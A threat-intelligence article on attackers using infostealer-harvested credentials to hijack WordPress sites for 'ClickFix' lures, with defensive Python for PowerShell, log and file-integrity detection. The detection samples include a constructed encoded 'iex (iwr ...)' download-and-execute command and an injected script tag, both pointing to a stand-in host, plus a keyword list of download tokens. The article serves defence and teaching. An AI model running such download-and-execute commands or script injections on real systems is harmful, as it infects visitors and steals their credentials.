Infostealers Fuel Vicious Cycle, Hijacking Victim Websites to Spread More Malware

Cybercrime Feedback Loop: Threat Actors Use Stolen Credentials to Turn Business Websites into Malware Distribution Platforms

HIGH
January 3, 2026
5m read
Malware, Cyberattack, Threat Intelligence

Related Entities

Organizations: Hudson Rock

Other: Lumma, Vidar, Stealc (infostealer families)

Full Report

Executive Summary

Research from the Hudson Rock Threat Intelligence Team has uncovered a highly effective and self-sustaining cybercrime feedback loop. Threat actors are weaponizing credentials harvested by infostealer malware (such as Lumma and Vidar) to gain administrative access to legitimate business websites, particularly those running on WordPress. Once in control, they inject malicious code, transforming these trusted domains into hosts for new malware distribution campaigns. These campaigns often use a social engineering technique dubbed "ClickFix," which tricks visitors into pasting and executing malicious PowerShell commands. This creates a vicious cycle: the compromised sites distribute more infostealers, which harvest more credentials, leading to more compromised websites. This tactic allows attackers to abuse the reputation of legitimate businesses to bypass security controls and reach a wider audience of potential victims.

Threat Overview

This trend represents a strategic evolution in the cybercrime ecosystem, moving from simply selling stolen credentials to actively using them to co-opt victim infrastructure. The feedback loop is dangerously efficient:

  1. Infection: A user is infected with an infostealer like Lumma or Vidar, which steals credentials saved in their browser.
  2. Harvesting: The attacker collects these credentials, which may include logins for a business's WordPress admin panel, cPanel, or FTP server.
  3. Compromise: The attacker uses the stolen credentials to log into the business website and inject malicious scripts.
  4. Distribution: The now-compromised website is used to host a new malware campaign.
  5. Re-Infection: Visitors to the trusted but compromised site are tricked into downloading the next wave of infostealer malware, starting the cycle anew.

Hudson Rock's analysis of 1,600 malicious domains found that 13% were legitimate business sites whose admin credentials had been found in previous infostealer logs, directly confirming this link.

Technical Analysis

The "ClickFix" technique is the distribution phase of the loop. Step by step:

  1. Initial Access (T1078 - Valid Accounts): The attacker logs into the website's administrative backend (WordPress admin, cPanel, FTP) with the stolen credentials. No exploit is needed, and because the password is valid there may be no failed login attempts in the logs at all.
  2. Lure Staging (T1608.004 - Stage Capabilities: Drive-by Target): The attacker injects JavaScript into the site, typically into a theme or plugin file, that shows visitors a fake security challenge or error message, for example a counterfeit CAPTCHA or a "browser update required" page.
  3. Clipboard Hijack: When the visitor clicks the "verify" button, the injected script silently writes a PowerShell one-liner to the clipboard with navigator.clipboard.writeText. Nothing is downloaded and the browser shows no warning, because writing to the clipboard in response to a user click is permitted by design.
  4. User Execution (T1204.004 - User Execution: Malicious Copy and Paste): The page then instructs the visitor to press Win+R, paste (Ctrl+V) and press Enter, presenting this as entering a verification code. The Run dialog hands the pasted text to powershell.exe, so the parent of the malicious process is explorer.exe, not the browser.
  5. Execution and Payload Delivery (T1059.001 - PowerShell; T1105 - Ingress Tool Transfer): The command, usually run with a hidden window and often Base64-encoded, downloads and runs the next-stage loader, which installs another infostealer such as Lumma or Vidar.

ClickFix is effective because it sidesteps the controls built around downloads. The browser never writes a file, so there is no Mark-of-the-Web, no SmartScreen prompt and no download warning; the user, not the browser, launches the code. What remains on the endpoint is the evidence of that launch: a process-creation record for powershell.exe with explorer.exe as its parent, and the pasted command stored in the Run dialog's history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
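The endpoint side of the chain above, as an added example (this is not Hudson Rock's tooling or code from the article): a detection rule over process-creation events that decodes the -EncodedCommand payload, checks for a hidden window and inline download, and requires explorer.exe (the Run dialog) as the parent so that scheduled admin scripts do not fire. The event records are constructed for illustration and only loosely follow the fields of Windows Event ID 4688 / Sysmon Event ID 1; the domain example.invalid is a reserved, non-resolving name.

```python
"""ClickFix detection over process-creation telemetry (added example)."""
import base64
import binascii
import re
import shlex
from typing import Optional

# Parents that mean a human typed or pasted the command. explorer.exe hosts the
# Win+R Run dialog, which is ClickFix's usual path. A browser is NOT expected
# here: in ClickFix the browser never launches anything.
PASTE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}

# Strings that indicate the command fetches and evaluates remote code.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "iwr",
                     "invoke-webrequest", "frombase64string", "http://", "https://")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE in Base64), or None."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        # powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...)
        # plus the alias -ec; -ep (ExecutionPolicy) is not a prefix and is skipped.
        if flag and ("encodedcommand".startswith(flag) or flag == "ec"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze(event: dict) -> dict:
    """Score one process-creation event for ClickFix indicators."""
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("cmdline", "")
    reasons = []
    if image not in ("powershell.exe", "pwsh.exe"):
        return {"alert": False, "reasons": reasons, "decoded": None}
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    if re.search(r"(?i)-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", cmdline):
        reasons.append("hidden window")
    if parent in PASTE_PARENTS:
        reasons.append(f"pasted via {parent}")
    haystack = (cmdline + " " + (decoded or "")).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in haystack]
    if hits:
        reasons.append("download/eval: " + ", ".join(hits))
    # Fire only for a human-paste parent plus at least one more indicator.
    alert = parent in PASTE_PARENTS and len(reasons) >= 2
    return {"alert": alert, "reasons": reasons, "decoded": decoded}


def find_alerts(events: list) -> list:
    """Return the analysis for every event that trips the rule."""
    results = [dict(analyze(e), cmdline=e["cmdline"]) for e in events]
    return [r for r in results if r["alert"]]


def _encode(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix: victim pressed Win+R, pasted, Enter. explorer.exe is the parent.
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -w hidden -nop -enc "
                   + _encode("iex (iwr 'https://example.invalid/verify').Content"),
    },
    {   # Benign: a scheduled task runs a maintenance script by path.
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\cleanup.ps1",
    },
    {   # Benign: an admin runs a plain cmdlet from the Run dialog, no download.
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe Get-Service",
    },
]

if __name__ == "__main__":
    for hit in find_alerts(SAMPLE_EVENTS):
        print(hit["reasons"], "->", hit["decoded"])
```

The rule needs command-line auditing to be on (4688 with "Include command line in process creation events", or Sysmon); without it the encoded payload is never logged. The substring checks are deliberately broad (for instance "iex" also matches other words), which is why the parent-process condition carries the weight of the verdict.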

Impact Assessment

  • For Hijacked Businesses: Their websites are flagged as malicious, destroying their reputation, tanking their SEO, and getting them blacklisted by security vendors. They may also face legal liability for distributing malware.
  • For End Victims: They are infected with potent infostealer malware, leading to the theft of their own credentials, financial data, and personal information, perpetuating the cycle.
  • For the Ecosystem: This feedback loop greatly increases the scale and reach of infostealer campaigns, making them more resilient and harder to stamp out. Every victim potentially becomes an unwitting part of the attacker's infrastructure.

Cyber Observables for Detection

  • Successful logins to website admin panels (e.g., /wp-admin, /wp-login.php, cPanel) from unfamiliar IP addresses or hosting ranges. With stolen credentials there is no brute-force noise to catch; the first attempt succeeds.
  • Unexpected modifications to core website files (e.g., index.php, .htaccess) or to theme and plugin files, or the appearance of new, strangely named PHP files under wp-content/.
  • Outbound network connections from a web server to known malware C2 or payload-hosting domains.
  • On endpoints, powershell.exe launched by explorer.exe with an encoded command, a hidden window, or an inline download in the command line.

Type | Value | Description | Context | Confidence
file_path | /wp-admin/, /wp-login.php | A successful administrative login from an IP, ASN or country not previously seen for that account. Failed attempts followed by a success indicate credential stuffing; valid stolen credentials produce a success on the first try with no failures. | Web server logs | medium
file_name | index.php, .htaccess, theme and plugin PHP files | Unauthorized modifications to these files are a common sign of website compromise. | File Integrity Monitoring (FIM) | high
command_line_pattern | powershell -enc | Encoded PowerShell with explorer.exe as the parent process is a hallmark of ClickFix. Requires command-line auditing (Event ID 4688 with "Include command line in process creation events" enabled) or Sysmon Event ID 1. | EDR, Windows Event ID 4688, Sysmon Event ID 1 | high

Detection & Response

  • File Integrity Monitoring (FIM): Implement FIM on web servers to alert on any unauthorized change to website files. This can provide the earliest indicator that a site has been compromised. Keep the baseline off the web host, because an attacker holding admin credentials can also edit a baseline stored beside the site, and re-baseline only after verified updates.
  • Endpoint Detection and Response (EDR): On the client side, EDR is crucial for detecting the execution of suspicious PowerShell. Note that the browser is not the parent of the malicious process: the command is pasted into the Run dialog, so the high-fidelity pattern is explorer.exe spawning powershell.exe with a hidden window, an encoded command, or an inline download (iwr/iex, DownloadString), followed by a network connection. The pasted text also survives in the user's RunMRU registry key and is worth collecting during triage.
  • Log Analysis: Review web server access logs for successful administrative logins from new IPs or hosting ranges, for POSTs to the built-in theme and plugin editors (/wp-admin/theme-editor.php, /wp-admin/plugin-editor.php) and to plugin upload endpoints, and for new PHP files appearing under wp-content/uploads/. Credential stuffing shows up as many failed logins before a success; reuse of stolen credentials may show no failures at all.
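The log-analysis bullet and the observables table, worked through as an added example (not code from the article or from Hudson Rock): a pass over Apache combined-format access log lines that flags a successful WordPress login from an IP outside the known admin set and a subsequent POST to the theme or plugin editor from that same IP within a short window. The log lines, the known-admin IP (203.0.113.10) and the attacker IP (198.51.100.7) are constructed from reserved documentation ranges, and the status-code rule relies on WordPress answering a correct login with a 302 redirect and a wrong one by re-rendering the form with 200.

```python
"""WordPress admin-compromise detection over access-log lines (added example)."""
import re
from datetime import datetime, timedelta

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Endpoints through which a logged-in admin can write PHP into the site.
EDITOR_PATHS = ("/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php",
                "/wp-admin/update.php")
# Assumed allowlist of addresses from which admins normally log in (constructed).
KNOWN_ADMIN_IPS = {"203.0.113.10"}
WINDOW = timedelta(minutes=30)


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, known_ips=KNOWN_ADMIN_IPS) -> list:
    """Return alerts for new-IP admin logins and file edits that follow them."""
    alerts = []
    recent_logins = {}  # ip -> time of the last successful login
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        base = rec["path"].split("?", 1)[0]
        if base == "/wp-login.php" and rec["method"] == "POST":
            # 302 = accepted credentials (redirect into /wp-admin/); 200 = form shown again.
            if rec["status"] == 302:
                recent_logins[rec["ip"]] = rec["ts"]
                if rec["ip"] not in known_ips:
                    alerts.append({"kind": "admin_login_from_new_ip", "ip": rec["ip"],
                                   "ts": rec["ts"], "ua": rec["ua"]})
        elif base in EDITOR_PATHS and rec["method"] == "POST":
            last = recent_logins.get(rec["ip"])
            kind = "admin_file_edit"
            if last is not None and rec["ts"] - last <= WINDOW and rec["ip"] not in known_ips:
                kind = "file_edit_after_new_ip_login"
            alerts.append({"kind": kind, "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"]})
    return alerts


# Constructed sample log (not real traffic). shop.example is a reserved name.
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Jan/2026:09:02:11 +0000] "POST /wp-login.php HTTP/1.1" 302 0 '
    '"https://shop.example/wp-login.php" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jan/2026:21:40:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 '
    '"-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jan/2026:21:41:50 +0000] "GET /wp-admin/theme-editor.php?file=footer.php&theme=storefront HTTP/1.1" 200 18422 '
    '"-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Jan/2026:21:43:07 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 '
    '"https://shop.example/wp-admin/theme-editor.php" "Mozilla/5.0"',
    '192.0.2.55 - - [03/Jan/2026:22:05:19 +0000] "POST /wp-login.php HTTP/1.1" 200 4102 '
    '"-" "python-requests/2.31"',
]


def run_sample() -> list:
    """Run the detector over the constructed sample."""
    return detect(SAMPLE_LOG)


if __name__ == "__main__":
    for a in run_sample():
        print(a["kind"], a["ip"], a["ts"].isoformat(), a.get("path", ""))
```

The known-IP set stands in for whatever baseline you have (VPN egress, office ranges, or the set of IPs seen for each admin account over the previous month). Only the second login trips the rule: it comes from an address the account has never used, and the editor POST three minutes later from the same address turns a medium-confidence login alert into a high-confidence compromise.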

Mitigation

  • Multi-Factor Authentication (MFA): The single most effective mitigation. Enforce MFA on all website administrative accounts (D3-MFA: Multi-factor Authentication). A stolen password alone is then insufficient for the attacker to log in. Two caveats: infostealers also steal browser session cookies, so pair MFA with short admin session lifetimes and invalidate all sessions when resetting a compromised password; and plain FTP has no second factor, so replace it with SFTP and key-based authentication or disable it.
  • User Education: Train end-users to be suspicious of unusual website behavior. Specifically, teach them that no legitimate website will ever ask them to copy and paste code into their system's Run dialog or terminal.
  • Credential Hygiene: Do not save administrative passwords in web browsers, where infostealers harvest them directly from the browser's credential store. Use a dedicated password manager, and rotate any admin credential that was ever saved in a browser on a machine that may have been infected.
  • Website Hardening: Keep all website software (CMS, plugins, themes) up to date. Restrict administrative portals (/wp-admin, /wp-login.php, cPanel) to trusted office or VPN IP addresses, and disable the in-browser theme and plugin file editors (in WordPress, set DISALLOW_FILE_EDIT in wp-config.php), which removes the easiest path for injecting code after a login.

Timeline of Events

January 3, 2026: This article was published.

MITRE ATT&CK Mitigations

  • M1032 - Multi-factor Authentication: Enforce MFA on all administrative accounts. This is the single most effective control to break the feedback loop by preventing the initial website compromise. Mapped D3FEND technique: D3-MFA.
  • M1017 - User Training: Educate users to recognize social engineering tactics like 'ClickFix' and to never execute code from untrusted sources.
  • M1040 - Behavior Prevention on Endpoint: Use modern endpoint protection (EDR) that can detect malicious PowerShell execution and infostealer behaviors.
D3FEND Defensive Countermeasures

The entire feedback loop described in this attack depends on the attacker's ability to reuse stolen credentials. Implementing mandatory Multi-Factor Authentication (MFA) on all administrative interfaces (WordPress, cPanel, SFTP, etc.) is the most critical and effective countermeasure. This single control breaks the chain at its password-reuse link: even with a valid stolen password, the attacker cannot complete the login without the second factor. The remaining gap is stolen session cookies, which short admin session lifetimes and session invalidation on password reset close. For businesses managing websites, this is not optional; it is a fundamental security requirement, and it would have kept the 13% of legitimate sites in Hudson Rock's sample from being hijacked. It is the highest priority mitigation.

For the businesses whose sites are being hijacked, early detection is key to minimizing damage. Implementing a File Integrity Monitoring (FIM) solution on the web server is crucial. A FIM tool records a baseline of every website file (typically a cryptographic hash per file) and then continuously compares the live tree against it, reporting changes, additions and deletions. It would alert the site administrator the moment an attacker injects a malicious script into a theme file or modifies a core file like index.php. This allows for rapid response, taking the site offline, removing the malicious code, resetting passwords and invalidating sessions, before the site can be used to infect a large number of visitors. This provides a critical detection layer at the point of compromise.
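The baseline-and-compare mechanism described above, as an added example (not Hudson Rock's or any vendor's FIM product): a minimal integrity monitor that hashes every file under a web root, serialises the baseline, and reports what was added, deleted or modified. The demo builds a constructed stand-in for a WordPress document root in a temporary directory, then simulates the attacker injecting a script tag into a theme footer and dropping a new PHP file; file names and the example.invalid domain are invented for the demonstration.

```python
"""Minimal file-integrity baseline and diff for a web root (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(root: Path, baseline: dict) -> dict:
    """Diff the live tree against a stored baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in current.keys() & baseline.keys()
                           if current[p] != baseline[p]),
    }


def demo() -> dict:
    """Build a constructed site, baseline it, simulate a compromise, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed stand-in for a WordPress docroot (contents are placeholders).
        (root / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
        (root / ".htaccess").write_text("RewriteEngine On\n")
        theme = root / "wp-content" / "themes" / "storefront"
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text("<footer>site footer</footer>\n")

        # The baseline would normally be written somewhere the web server's
        # account cannot modify (another host, or a read-only location).
        stored = json.dumps(build_baseline(root))

        # Simulated attacker actions after a login with stolen credentials:
        # a loader script tag appended to the theme footer, and a dropped PHP file.
        with (theme / "footer.php").open("a") as f:
            f.write('<script src="https://example.invalid/v.js"></script>\n')
        uploads = root / "wp-content" / "uploads"
        uploads.mkdir()
        (uploads / ".cache.php").write_text("<?php /* attacker-dropped file */ ?>\n")

        return compare(root, json.loads(stored))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run from a scheduled job under an account that can read the docroot but cannot write the baseline; after legitimate CMS, plugin or theme updates the diff will be noisy, so re-baseline immediately after each verified update rather than tuning the alert away.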

The 'ClickFix' technique relies entirely on tricking the end-user. Therefore, user education is a vital countermeasure. Security awareness training must be updated to include modern, browser-based social engineering tactics. Users need to be taught a simple, unbreakable rule: no legitimate website will ever require you to copy code and paste it into a command prompt or Run dialog to verify your identity or fix an error. This is always a trap. Using simulations and clear examples of the 'ClickFix' prompt can help solidify this learning. While technical controls are essential, an aware user is the last line of defense against social engineering that bypasses automated security.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Infostealer, Feedback Loop, ClickFix, PowerShell, WordPress, Lumma, Vidar, Malware Distribution
